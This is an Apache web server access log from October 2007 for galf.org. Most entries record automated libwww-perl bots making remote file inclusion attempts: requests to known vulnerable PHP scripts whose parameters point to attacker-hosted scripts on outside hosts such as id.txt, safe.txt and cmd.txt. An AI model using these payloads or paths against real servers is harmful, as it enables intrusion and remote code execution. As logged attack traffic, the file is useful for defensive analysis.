68.180.250.117 - - [07/Oct/2007:18:43:33 -0700] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.22.44.42 - - [07/Oct/2007:18:43:58 -0700] "GET /logs/access_070730.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.86.156.210 - - [07/Oct/2007:18:50:03 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://tkj-amurang.biz/swing/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.86.156.210 - - [07/Oct/2007:18:50:03 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://tkj-amurang.biz/swing/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:50:30 -0700] "GET /logs/access_070910.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:50:31 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:50:32 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:18:50:53 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:18:50:53 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:18:50:54 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.93.56.188 - - [07/Oct/2007:18:50:54 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.86.156.210 - - [07/Oct/2007:18:51:46 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://tkj-amurang.biz/swing/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.86.156.210 - - [07/Oct/2007:18:51:46 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://tkj-amurang.biz/swing/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:18:52:16 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:18:52:17 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:18:52:49 -0700] "GET /logs/access.log/index.php?p=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:18:52:49 -0700] "GET /index.php?p=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [07/Oct/2007:18:52:50 -0700] "GET /logs/index.php?p=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.86.156.210 - - [07/Oct/2007:18:53:50 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://tkj-amurang.biz/swing/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.89.135 - - [07/Oct/2007:18:55:42 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.89.135 - - [07/Oct/2007:18:55:42 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.53.138.3 - - [07/Oct/2007:18:56:07 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt?http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
208.53.138.3 - - [07/Oct/2007:18:56:07 -0700] "GET //skin/zero_vote/error.php?dir=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt?http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
208.113.151.18 - - [07/Oct/2007:18:56:25 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.151.18 - - [07/Oct/2007:18:56:25 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.diabolick.org/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.122.36.10 - - [07/Oct/2007:18:57:19 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt?http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.122.36.10 - - [07/Oct/2007:18:57:19 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt?http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.122.36.10 - - [07/Oct/2007:18:58:51 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.trezze.suroot.com/cmd/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.122.36.10 - - [07/Oct/2007:18:58:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.trezze.suroot.com/cmd/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:59:11 -0700] "GET /logs/access_070826.log//includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.92.85.234 - - [07/Oct/2007:18:59:12 -0700] "GET //includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
213.92.85.234 - - [07/Oct/2007:18:59:12 -0700] "GET /logs//includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:19:00:46 -0700] "GET /logs/access_070910.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:19:00:46 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:19:00:46 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:19:02:09 -0700] "GET /logs/access_070827.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [07/Oct/2007:19:02:16 -0700] "GET /logs/access_070910.log/spaw_control.class.php?spaw_root=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.225.86.155 - - [07/Oct/2007:19:03:14 -0700] "GET /logs/access_070826.log//includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
206.225.86.155 - - [07/Oct/2007:19:03:15 -0700] "GET //includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
206.225.86.155 - - [07/Oct/2007:19:03:15 -0700] "GET /logs//includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
213.92.85.234 - - [07/Oct/2007:19:03:20 -0700] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.4.234.2 - - [07/Oct/2007:19:03:31 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.4.234.2 - - [07/Oct/2007:19:03:31 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
74.222.3.125 - - [07/Oct/2007:19:03:36 -0700] "GET /logs/access_070326.log?t=&postorder=desc HTTP/1.1" 200 300674 "-" "-" "www.galf.org"
74.222.3.125 - - [07/Oct/2007:19:03:53 -0700] "GET /logs/access_070507.log?t=&postorder=desc HTTP/1.1" 200 241846 "-" "-" "www.galf.org"
202.4.234.2 - - [07/Oct/2007:19:03:58 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.4.234.2 - - [07/Oct/2007:19:03:58 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
74.222.3.125 - - [07/Oct/2007:19:04:14 -0700] "GET /logs/access_070423.log?t=&postorder=desc HTTP/1.1" 200 239649 "-" "-" "www.galf.org"
74.222.3.125 - - [07/Oct/2007:19:04:49 -0700] "GET /logs/access_070611.log?t=&postorder=desc HTTP/1.1" 200 443571 "-" "-" "www.galf.org"
145.253.76.204 - - [07/Oct/2007:19:05:00 -0700] "POST /logs/access_070611.log?t= HTTP/1.0" 405 3303 "http://www.galf.org/logs/access_070611.log?t=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:19:06:16 -0700] "GET /logs/access_070826.log//includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.106.42.129 - - [07/Oct/2007:19:06:17 -0700] "GET //includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.42.129 - - [07/Oct/2007:19:06:17 -0700] "GET /logs//includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:19:06:49 -0700] "GET /logs/access_070910.log/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:19:06:49 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:19:06:50 -0700] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.152.128.48 - - [07/Oct/2007:19:07:04 -0700] "GET / HTTP/1.1" 200 1048 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.galf.org"
68.122.36.10 - - [07/Oct/2007:19:11:38 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.trezze.suroot.com/cmd/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.122.36.10 - - [07/Oct/2007:19:11:38 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.trezze.suroot.com/cmd/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.193.144.30 - - [07/Oct/2007:19:13:05 -0700] "GET /logs//include.php?path[docroot]=http://www.ric3sk9.xpgplus.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
193.193.144.30 - - [07/Oct/2007:19:13:05 -0700] "GET //include.php?path[docroot]=http://www.ric3sk9.xpgplus.com.br/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.122.36.10 - - [07/Oct/2007:19:15:52 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt?http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.122.36.10 - - [07/Oct/2007:19:15:52 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt?http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.3.85.33 - - [07/Oct/2007:19:17:24 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.53.95.2 - - [07/Oct/2007:19:17:26 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.53.95.2 - - [07/Oct/2007:19:17:27 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.53.95.2 - - [07/Oct/2007:19:17:30 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
58.53.95.2 - - [07/Oct/2007:19:17:31 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
202.4.234.2 - - [07/Oct/2007:19:19:39 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.4.234.2 - - [07/Oct/2007:19:19:39 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.4.234.2 - - [07/Oct/2007:19:19:44 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.4.234.2 - - [07/Oct/2007:19:19:45 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
74.6.23.157 - - [07/Oct/2007:19:21:12 -0700] "GET /logs/access_070212.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
211.108.60.242 - - [07/Oct/2007:19:21:37 -0700] "GET /logs/access_070709.log/index.php?p=http://terious.co.kr/script/data/asd/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.77.54.220 - - [07/Oct/2007:19:22:28 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://sindromx.us/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.77.54.220 - - [07/Oct/2007:19:22:31 -0700] "GET /spaw_control.class.php?spaw_root=http://sindromx.us/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.77.54.220 - - [07/Oct/2007:19:23:21 -0700] "GET /logs//dmin/editor2/spaw_control.class.php?spaw_root=http://sindromx.us/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.77.54.220 - - [07/Oct/2007:19:23:23 -0700] "GET //dmin/editor2/spaw_control.class.php?spaw_root=http://sindromx.us/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.77.54.220 - - [07/Oct/2007:19:24:27 -0700] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://sindromx.us/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.77.54.220 - - [07/Oct/2007:19:24:29 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://sindromx.us/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.53.95.2 - - [07/Oct/2007:19:24:37 -0700] "GET /logs/access.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.77.54.220 - - [07/Oct/2007:19:25:02 -0700] "GET /logs//editor2/spaw_control.class.php?spaw_root=http://sindromx.us/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
193.77.54.220 - - [07/Oct/2007:19:25:03 -0700] "GET //editor2/spaw_control.class.php?spaw_root=http://sindromx.us/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.3.85.33 - - [07/Oct/2007:19:28:26 -0700] "GET /logs/access_070827.log//modules/4nAlbum/public/displayCategory.php?basepath=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.3.85.33 - - [07/Oct/2007:19:28:27 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.3.85.33 - - [07/Oct/2007:19:28:27 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:29:35 -0700] "GET /logs/access_070827.log/4nalbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:29:35 -0700] "GET /logs/access_070827.log/4nAlbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:29:35 -0700] "GET /4nalbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:29:35 -0700] "GET /4nAlbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:29:35 -0700] "GET /logs/4nalbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:29:35 -0700] "GET /logs/4nAlbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.4.234.2 - - [07/Oct/2007:19:29:36 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.4.234.2 - - [07/Oct/2007:19:29:38 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://pemburujablay.biz/gambar/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.213.88.13 - - [07/Oct/2007:19:29:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.213.88.13 - - [07/Oct/2007:19:29:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.meetingspace.com/media/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.213.88.13 - - [07/Oct/2007:19:29:46 -0700] "GET //skin/zero_vote/error.php?dir=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.213.88.13 - - [07/Oct/2007:19:29:46 -0700] "GET //skin/zero_vote/error.php?dir=http://www.meetingspace.com/media/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:33:48 -0700] "GET /logs/4nalbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:33:48 -0700] "GET /4nalbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:33:50 -0700] "GET /logs/4nAlbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:33:50 -0700] "GET /4nAlbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.122.36.10 - - [07/Oct/2007:19:36:56 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt?http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.122.36.10 - - [07/Oct/2007:19:36:56 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt?http://www.inteligentesite.com.br/arquivos/marajoara/File/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.3.192.124 - - [07/Oct/2007:19:38:58 -0700] "GET /logs/access_070910.log/scanhttp://www.benspoetter.com//contenido/cronjobs/me.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
195.3.192.124 - - [07/Oct/2007:19:38:58 -0700] "GET /scanhttp://www.benspoetter.com//contenido/cronjobs/me.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
195.3.192.124 - - [07/Oct/2007:19:38:58 -0700] "GET /logs/scanhttp://www.benspoetter.com//contenido/cronjobs/me.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
69.57.189.226 - - [07/Oct/2007:19:39:41 -0700] "GET /logs/access.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:39:53 -0700] "GET /logs/access_070618.log/4nAlbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.167.105 - - [07/Oct/2007:19:39:53 -0700] "GET /logs/access_070618.log/4nalbum/public/displayCategory.php?basepath=http://www.kustomwagens.com/phpbb2/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.3.192.124 - - [07/Oct/2007:19:40:20 -0700] "GET /logs/access.log/scanhttp://www.benspoetter.com//contenido/cronjobs/me.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
84.18.200.169 - - [07/Oct/2007:19:44:59 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.kadastra.com/de/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
200.203.122.135 - - [07/Oct/2007:19:46:10 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.94.220.210 - - [07/Oct/2007:19:47:17 -0700] "GET /index.php?inc=http://www.tryon.pagebr.com/fei/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:19:50:44 -0700] "GET /logs/access_070826.log//includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.37.212.106 - - [07/Oct/2007:19:50:44 -0700] "GET //includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.106 - - [07/Oct/2007:19:50:44 -0700] "GET /logs//includes/dbal.php?eqdkp_root_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.239.167.90 - - [07/Oct/2007:19:51:16 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.coverbands.info/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
204.239.167.90 - - [07/Oct/2007:19:51:16 -0700] "GET //skin/zero_vote/error.php?dir=http://www.coverbands.info/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
